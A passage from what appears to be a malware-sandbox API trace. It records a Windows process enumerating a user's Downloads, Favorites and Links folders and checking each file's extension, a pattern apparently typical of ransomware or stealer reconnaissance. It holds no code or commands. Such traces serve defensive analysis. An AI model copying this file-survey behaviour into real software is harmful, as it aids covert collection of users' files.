(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.432] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0194.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0194.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.433] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.433] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.433] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.433] PathFindFileNameW (pszPath="") returned="" [0194.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.434] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.434] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.434] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.435] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini") returned=".ini" [0194.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.435] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0194.435] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0194.436] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.436] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.438] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0194.438] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.438] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.438] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.438] PathFindFileNameW (pszPath="") returned="" [0194.438] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.439] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini") returned=".ini" [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0194.439] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0194.439] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.439] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0194.439] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.440] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0194.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.440] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0194.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.440] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.440] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.440] PathFindFileNameW (pszPath="") returned="" [0194.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.440] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0194.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.441] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.441] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.441] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\desktop.ini") returned=".ini" [0194.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.442] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0194.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.442] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk") returned=".lnk" [0194.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0194.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.443] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk") returned=".lnk" [0194.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0194.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.445] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk") returned=".lnk" [0194.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.445] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0194.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.446] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk") returned=".lnk" [0194.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0194.446] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0194.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0194.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0194.447] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0194.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0194.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.454] RtlAllocateHeap 